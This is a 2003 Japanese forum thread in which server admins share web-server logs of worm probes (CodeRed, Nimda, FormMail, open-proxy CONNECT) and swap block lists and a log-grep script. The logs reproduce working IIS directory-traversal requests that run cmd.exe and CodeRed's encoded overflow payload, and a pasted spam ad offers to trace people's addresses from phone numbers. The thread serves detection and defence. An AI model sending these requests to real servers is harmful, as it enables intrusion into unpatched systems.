この鯖ワームにやられてます
ログを汚すだけではなく、ネットワーク資源のムダ使いの
CodeRedやNimdaその他のワームにやられてる鯖を教え合おう!!
管理者がこの板みて、対処を期待する。
おー鯖管理に関する話題だな。
でもな、ワームによってはIP詐称してるのもアルからな
そういうのはどうする>>1 ?
いいかも。やっぱ気持ち悪いじゃん。
ところで3ズサ━━━━⊂(゚Д゚⊂⌒`つ≡≡≡━━━━!!
218.114.46.157 [08/Feb/2003:10:57:07 +0900] - > GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
知らんなら本人に気づいて欲しいという意味でも晒しとくよ
あんたYahooBBかい?
それはワム
あんた馬鹿の一つ覚えを繰り返してるゴミ送信主かい?
どうやってやるんですか?
うちもYahooBBで、YahooBBにしてから(IPアドレスが218.*.*.*になってから)Nimdaの攻撃が激増したから聞いているだけなんだけど・・・
ここでも嫁
ttp://www.zdnet.co.jp/help/tips/linux/l0324.html
>>8
ワラタ
確かに、YahooBB(218.*.*.* と219.*.*.*がほとんど43.*.*.* 220.*.*.*は少ない)
はNimdaの攻撃が多い。www.bbtec.netはApache使ってるし
DNS(dns**.bbtec.net)はBIND8使ってるから、一般ユーザが感染していると考えられる。
常時接続で、知らぬ間にIIS探ししてるんだよね。1スキャンで16ヒットするから
ログ解析ツールwebalizer,mrtgその他を使うとすぐ分る。
根本解決は管理者に教えてあげることだけど、めんどくさく、難しい事も多い。
逆引き出来れば良い方で、IP偽ってるのも結構ある。
対処方法は、>>6 が言っているようにログに残らないようにするのが簡単。
さすがにCodeRed/Nimda/Slammer級のワームについては対策されてると思いたいが。。。
今ごろになってもNimdaやらまきちらしてるのは
知らないうちにIISが動いてて持ち主も把握してないようなマシンだろう。
そういう「持ち主」はいても「管理者」はいないようなマシンは
リプレースされるまでそのままだと思うよ。
219.180.170.51 - - [09/Feb/2003:22:38:17 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 447
80.204.44.179 - - [10/Feb/2003:00:34:17 +0900] "GET /default.ida?NNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u5
31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 309 "-" "-"
nslookupで引くとほとんどがぷららさん・・・
( ´,_ゝ`)フ゜ッ
わざわざ dig や host のために bind for win をインストールしたり、
dnsip やら dnsipq やらのためにわざわざパッチ当てて
djbdns をコンパイルするのはアレだし。
この程度のことならば nslookup でも特に問題にならんと思うんだけど、
他に Windows で使えるいいツール知らんかい? >>20
218.200.211.35 - - [10/Feb/2003:07:28:41 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:04 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:05 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:06 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 373 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:08 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:09 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:11 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
root@アクセス元IPアドレス
とかに警告メール出すようなソフトだれか作ってくり。
http://reuven.lerner.co.il/projects/Apache-CodeRed-1.07.tar.gz
make test
PERL_DL_NONLAZY=1 /usr/bin/perl -Iblib/arch -Iblib/lib -I/usr/libdata/perl/5.00503/mach -I/usr/libdata/perl/5.00503 test
.pl
1..1
Can't locate warnings.pm in @INC (@INC contains: blib/arch blib/lib /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.0
0503 /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.00503 /usr/local/lib/perl5/site_perl/5.005/i386-freebsd /usr/loc
al/lib/perl5/site_perl/5.005 .) at blib/lib/Apache/CodeRed.pm line 4.
BEGIN failed--compilation aborted at blib/lib/Apache/CodeRed.pm line 4.
BEGIN failed--compilation aborted at test.pl line 10.
*** Error code 2
Stop in /tmp/Apache-CodeRed-1.07
★ココだ★ココだ★
警告メールは、やっぱり、
「回線切って、首つって、R」
みたいなの?
それってぷららのDDNS使ってるからじゃない?
Nimdaはご近所さん攻撃するものだし。
所詮DDNSは、とりあえず立てましたって人が使うから管理甘いのよね。
こんだけ騒がれてるのにいまだにワームをまきちらかしてるような奴が
そんなの読むわけないと思われ。
だいたいWindowsが多いんだからrootに出してもまず無意味。
net send(smbclient -M)を送り返すとかしたほうがまだしも効果があるだろう。
62.217.134.16 - - [13/Feb/2003:19:21:53 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 226
最近1日3回位くるYO ちなみに屋不ーBB
[Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..タッ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%5c/winnt/system32/cmd.exe
[Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%2f/winnt/system32/cmd.exe
俺みたいにISDNで鯖をやってるようなヤシの所にも来るのか・・・
うちもYahoo!BBだよ。
多すぎってほどじゃないけど、やっぱり日に2〜5件くらいはくるですねぇ。
全然久々じゃないじゃないか (w
もっと勉強してから立てれ
その1
[Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/scripts
[Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/MSADC
[Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/c
[Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/d
その2
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/scripts
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/MSADC
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/c
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/d
両方ともにahoo!BB。
頼むよ。漏れもahoo!BBなんだけどさ(涙
わんさか来たので、ログの一部をサポートセンターに
送って対処をお願いしたら、それ以後は随分少なく
なりましたよ。まあ、偶然かもしれませんが...
どうやら、土日はお休みで電源が落ちていただけの模様です。
ただのパソコンなんだろうな...
相手は設計事務所のサーバーだったそうです。 それだから連絡先がわかった、と
いうことでもありますが。 プロバイダーはシカトを決め込んでいたそうです。
前OCNユーザーから1日200通のウイルスメールがきたときは
さすがにたまりかねてOCNに連絡したよ…
鯖とは関係ない話だがな…
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
218.11.16.6 - - [06/Mar/2003:21:32:04 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
218.4.144.106 - - [06/Mar/2003:21:09:25 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
218.12.182.39 - - [06/Mar/2003:07:46:12 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
いい加減蝋人形にしちゃうよ?!
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
218.18.18.72 - - [08/Mar/2003:15:38:43 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
218.27.89.97 - - [08/Mar/2003:18:23:39 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
218.6.243.62 - - [08/Mar/2003:19:01:17 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
218.244.75.70 - - [08/Mar/2003:20:31:32 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
いい加減蝋人形にしちゃうよ?!
韓国 61.250.216.1
中国 61.132.75.252
if [ $1 ] && [ -f $1 ]; then
ACCESS_LOG=$1
elif [ -f /usr/local/apache/logs/access_log ]; then
ACCESS_LOG=/usr/local/apache/logs/access_log
else
echo "usage: $0 path_to_access_log"
exit 1
fi
egrep "cmd.exe|root.exe|NNNNNN" $ACCESS_LOG \
| awk '{ print $4,$5,$1; }' \
| sort -k 3,3 -u | sort -k 1,1 \
| sed -e 's/^/スキャン歓迎: /g' | more
exit 0
上のようなログがたくさんあるんですが、404じゃなくて302なのです・・・。
なんでかわかるかた教えてくださいm(__)m
[Sun Mar 09 23:10:05 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ/winnt/system32/cmd.exe
[Sun Mar 09 23:10:07 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..タッ/winnt/system32/cmd.exe
[Sun Mar 09 23:10:09 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ・winnt/system32/cmd.exe
[Sun Mar 09 23:10:15 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%5c/winnt/system32/cmd.exe
[Sun Mar 09 23:10:20 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%2f/winnt/system32/cmd.exe
川o・-・)ノ <先生!こんなのがありました!
__/ / /
\(_ノ ̄ ̄ ̄\
||ヽ|| ̄ ̄ ̄ ̄||
...|| ̄ ̄ ̄ ̄||
http://saitama.gasuki.com/saitama/
http://www.arearesearch.co.jp/ip-kensaku.html
今日は珍しく、アメリカのDSL回線とアラブ首長国連邦があった
ま た 中 国 か
0件: 5/Mar
0件: 6/Mar
0件: 7/Mar
0件: 8/Mar
0件: 9/Mar
0件: 10/Mar
12件: 11/Mar
48件: 12/Mar
2003/03/13(13:14:12) W-SV 219.*.***.*** [80] 404 237 "GET /
default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXY090V858\bd3W801Y090
V858\bd3W801Y090V858\bd3W801Y090Y090X190P0c3P003Xb00U31bU3ffP078
P000P0=a HTTP/1.0"
今まで見たNNNってヤシと違うもんだから気になって、、
★その目で確認すべし!!★超おすすめ★
国際的ですね(w
あと、日本国内だと普通の企業とか。
荒らしてくれるのは、
愛知、神奈川、埼玉あたりが多いです。
見てて気持ち悪いですよ。
61.191.128.106 - - [15/Mar/2003:20:26:20 +0900] "GET /default.ida?XXXX
XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
61.48.32.168 - - [15/Mar/2003:20:33:57 +0900] "GET /default.ida?XXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
61.83.171.22 - - [15/Mar/2003:22:54:03 +0900] "GET /default.ida?XXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276
219.168.40.15 - - [15/Mar/2003:06:09:38 +0900] "GET /default.ida?XXXXXXXXXXXXXX
219.93.193.170 - - [15/Mar/2003:12:12:01 +0900] "GET /default.ida?XXXXXXXXXXXXX
219.94.102.51 - - [15/Mar/2003:16:44:21 +0900] "GET /default.ida?XXXXXXXXXXXXXX
219.145.159.175 - - [15/Mar/2003:17:57:31 +0900] "GET /default.ida?XXXXXXXXXXXX
219.138.9.227 - - [15/Mar/2003:19:18:09 +0900] "GET /default.ida?XXXXXXXXXXXXXX
流行ってるね。
●浮気素行調査
彼氏、彼女、妻、夫の浮気を調査致します!!
●盗聴器盗撮機発見
あなたの部屋に誰かが仕掛けているかも!!
●行方調査
行方不明になっている家族の消息を調査致します!!
●電話番号から住所割り出し
一般電話、携帯から住所を割り出し致します!!
●ストーカー対策
社会問題ともなっているストーカーを撃退致します!!
その他人生相談からどんなお悩みでも解決いたします!!
直通 090−8505−3086
URL http://www.h5.dion.ne.jp/~grobal/
メール hentaimtt@k9.dion.ne.jp
グローバル探偵事務局
2003/03/16(20:33:31) W-SV 61.251.250.14 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:33) W-SV 61.251.250.14 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:36) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:36) W-SV 61.251.250.14 [80] 403 262 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:37) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:37) W-SV 61.251.250.14 [80] 403 275 "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:41) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:41) W-SV 61.251.250.14 [80] 403 275 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:44) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/msadc/..\../..\../..\/..チ../..チ../..チ../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:44) W-SV 61.251.250.14 [80] 403 291 "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:45) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..チ../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:45) W-SV 61.251.250.14 [80] 403 263 "GET /scripts/..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
規約ってなんだっ
219.138.52.14 - - [19/Mar/2003:00:45:01 +0900] "GET /default.ida?
219.234.238.253 - - [18/Mar/2003:18:09:40 +0900] "GET /default.ida?
219.215.44.61 - - [18/Mar/2003:20:44:08 +0900] "GET /default.ida?
219.138.1.212 - - [19/Mar/2003:01:34:27 +0900] "GET /default.ida?
219.68.217.243 - - [19/Mar/2003:01:50:51 +0900] "GET /default.ida?
中国でもWindowsServer使ってるのか・・・
テストのため1日晒してただけで結構来るねぇ。
YahooBB220013136085.bbtec.net - - [18/Mar/2003:04:00:21 +0900] "GET /default.ida?XXXXXXXXX
YahooBB220013232179.bbtec.net - - [18/Mar/2003:07:09:43 +0900] "GET /default.ida?XXXXXXXXX
YahooBB220027008006.bbtec.net - - [19/Mar/2003:09:17:43 +0900] "GET /default.ida?XXXXXXXXX
うちも220.*.*.*からばかり来てるな。
まだそれほど多いと感じて無いけど。
www.okxa.comというドメインのサイトですた。
何、ココ?エロゲサイト?
普通だす。
なんとかしたいのでつが・・・
サーバーは、BIGLOBEです。。
下にメアド書いてあるじゃん。とりあえず英語と中国語?で文句言ってみれば?
身に覚えのある人はパッチをあてて欲しいですね
218.***.***.***から目茶苦茶(100/day程度)来るんだけど
あーうぜー
210.220.73.20 - - [02/Apr/2003:06:56:31 +0900] "GET / HTTP/1.1" 200 765 "-" "-"
210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.printer HTTP/1.1" 404
1059 "-" "-"
210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u
0000%u0000%u838b%u0094%u0000%u408・・・以降文字化けで表示できない
ウチにも来たよ
211.189.57.126から
最初はイタズラされてるだけあかと持ったんだけど、新しいワームかね?
相手はコーリャンのIISでした。
211.158.61.191 - - [06/Apr/2003:05:12:20 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:25 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:31 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:36 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:41 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:47 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:52 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:57 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:02 +0900] "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:08 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194
211.158.61.191 - - [06/Apr/2003:05:13:13 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194
211.158.61.191 - - [06/Apr/2003:05:13:18 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:24 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:29 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:34 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215
ウザい。
(⌒⌒⌒)
||
/ ̄ ̄ ̄ ̄ ̄\
| ・ U |
| |ι |つ
U||  ̄ ̄ ||
 ̄  ̄
もうおこったぞう
61.232.0.1-61.237.255.254<!-- (CN)CHINA RAILWAY TELECOMMUNICATIONS CENTER -->
218.13.0.1-218.18.255.254<!-- (CN) CHINANET Guangdong province network Data Communication Division China Telecom -->
218.144.0.1-218.159.255.254<!-- (KR)KOREA TELECOM Network Management Center -->
220.64.0.1-220.71.255.254<!-- (KR)KRNIC Korea Network Information Center -->
220.72.0.1-220.87.255.254<!-- (KR)KOREA TELECOM Network Management Center -->
220.112.0.1-220.115.255.254<!-- (CN)Greatwall Broadband Network Co.Ltd. -->
220.163.0.1-220.165.255.254<!-- (CN)CHINANET yunnan province network China Telecom -->
アク禁
>最初はイタズラされてるだけあかと持ったんだけど、
いたずらしないで頂きたい。
ログ汚れ過ぎ
IIS狙われすぎ
ついでにsage過ぎ
あれ以来きてない。
>83
正解かも
IPアドレスじゃなくてドメインで狙われてるっぽいし・・・
09.191.15.2 - - [09/Apr/2003:08:04:57 +0900] "GET /cgi-bin/formmail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:01 +0900] "GET /cgi-bin/formmail.cgi HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:03 +0900] "GET /cgi-bin/FormMail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:05 +0900] "GET /cgi-bin/FormMail.cgi HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:09 +0900] "GET /cgi-sys/formmail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:10 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:21 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-sys/FormMail.pl HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-bin/Formmail.pl HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:24 +0900] "GET /cgi-bin/mail.pl HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:25 +0900] "GET /cgi-bin/FORMMAIL.PL HTTP/1.0" 404 1184
0-2pool57-34.nas10.lansing2.mi.us.da.qwest.net - - [08/Apr/2003:13:58:44 +0900] "CONNECT mailin-04.mx.aol.com:25 HTTP/1.0" 405 992 "-" "-"
多分オープンプロキシの検索ロボットだけど、踏み台に利用されないように。
>>87 は外部から任意のポートに接続できるプロクシを狙った spammer。
まえにスパムを配信するウイルスの実験が行われていた可能性があると
記事で読んだ記憶があるけど。
スパムとワーム。何かオーバラップらして見えてくるのは自分だけかな。
ヘッダーは2.4KBあり、、Comments:の行がやたら長いです。
本文はスパムみたいなんですけど、sendmailのバグを狙っているような...
ワームの様な気もしてます。。。
Return-Path: <mailbox1@usgreencardoffice.com>
Received: from smtp1.cwidc.net (smtp1.cwidc.net [154.33.63.111])
by xxxx.jp (8.12.8/8.12.5)
with ESMTP id h3BDBGKZ017325 for <xxxxx@xxxxx.jp>;
Fri, 11 Apr 2003 22:11:19 +0900
Received: from [154.33.63.58] (helo=mail8.cwidc.net)
by smtp1.cwidc.net
with esmtp (Exim 3.20 #4) id 193yJ3-0004So-00 for xxxxx@xxxxx.jp;
Fri, 11 Apr 2003 22:11:01 +0900
Received: from pop
by mail8.cwidc.net
with local (Exim 3.20 #2) id 193yIz-0003BH-00 for xxxxx@xxxxx.jp;
Fri, 11 Apr 2003 22:10:57 +0900
Received: from [206.40.228.122] (helo=sm22.localdomain)
by mail8.cwidc.net
with esmtp (Exim 3.20 #2) id 193yIy-0003AM-00;
Fri, 11 Apr 2003 22:10:56 +0900
Received: from unknown
Date: Fri, 11 Apr 2003 07:10:19 -0600 (MDT)
Message-Id: <200304111310.h3BDAJIV019352@sm22.localdomain>
Comments: Received: from PbD:C6?oC65]:?E6CB]@C];A|E2<6492?oC65]:?E6CB]@C];ANz
B Received: from Jx2<2oC65]24|2:2:oC65]2?]688]@C];A|46J`geb_oC65]2?]688]@C];A|7FC
F<2H2oC65]2?]688]@C];A|8@?K@FoC65]2?]688]@C];A|9\@oC65]2?]688]@C];ATx M Recei
ved: from Ma92>2oC65]2?]688]@C];A|9:0?6EoC65]2?]688]@C];A|9:<2CFoC65]2?]688]@C];
A|:K>\AoC65]2?]688]@C];A|<2EF9:D2oC65]2?]688]@C];A|<:>:oC65]2?]688]@C];ATv T Re
ceived: from Tu<F>2oC65]2?]688]@C];A|<FD2?@oC65]2?]688]@C];A|>:J2?@oC65]2?]688]
@C];A|?30>2?2oC65]2?]688]@C];A|E\6oC65]2?]688]@C];A|E2<2\<oC65]2?]688]@C];ATq
R Received: from AcE6E@C2oC65]2?]688]@C];A|A2EC:4<oC65]2EC]4@];A|92D6oC65]6>
2:=]?6];A|KIad_oC65]6>2:=]?6];A|36673@H=oC65]9@E]4@];A|3JC5oC65]9@E]4@];ATz G Re
ceived: from Rm9@?6J366oC65]9@E]4@];A|<:?492?oC65]9@E]4@];A|?282@oC65]9@E]4@]
;A|JFA@>oC65]9@E]4@];A|2=8oC65]:?E6CB]@C];A|3@>3oC65]:?E6CB]@C];AMr Z Receive
d: from Nr43c__7oC65]:?E6CB]@C];A|4J36CoC65]:?E6CB]@C];A|7F8F@oC65]:?E6CB]@C];
A|92J2EoC65]:?E6CB]@C];A|9:C@E@oC65]:?E6CB]@C];A|9@C:<:E2oC65]:?E6CB]@C];ATT
T Received: from Nz<2KF9:C@oC65]:?E6CB]@C];A|<:5oC65]:?E6CB]@C];A|<@3@=5DoC65]:
?E6CB]@C];A|>2DoC65]:?E6CB]@C];A|>2D2@oC65]:?E6CB]@C];A|>:J23:oC65]:?E6CB]@C];
ARb Y Received: from PQ?:;:oC65]:?E6CB]@C];A|?@<@oC65]:?E6CB]@C];A|D2326oC65]:
?E6CB]@C];A|D249:oC65]:?E6CB]@C];A|D6?36:oC65]:?E6CB]@C];A|D:=6?46oC65]:?E6CB]
@C];ARz M
Errors: mailbox1@usgreencardoffice.com
From: "US Green Card Office Ltd." <mailbox1@usgreencardoffice.com>
To: Customer <customer@usgreencardoffice.com>
Subject: Get a Green Card for USA
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:
219.140.150.166 - - [13/Apr/2003:16:51:23 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-"
219.140.150.166 - - [13/Apr/2003:16:51:26 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-"
・
・
・
前にCodeRedに対抗するCode Greenてのが来たけど
もう来ないな。
またこないかな。
NetRange: 202.0.0.0 - 203.255.255.255
CIDR: 202.0.0.0/7
ここ、IPうじゃうじゃ持ってて最高にうざい。
二日で100個以上CodeRed来てるけど、ここが8割占めてたw
LAN内全感染の悪寒。
ってかIPいっぱいあるから一見いろんなとこから来てるみたいだけど、穴のあるところが
全部穴になって被害を広めてるのね。
#Apache初心者だから、ログを取らせない方法が良くわかんねえよ。
・ウイルス扱いにする。
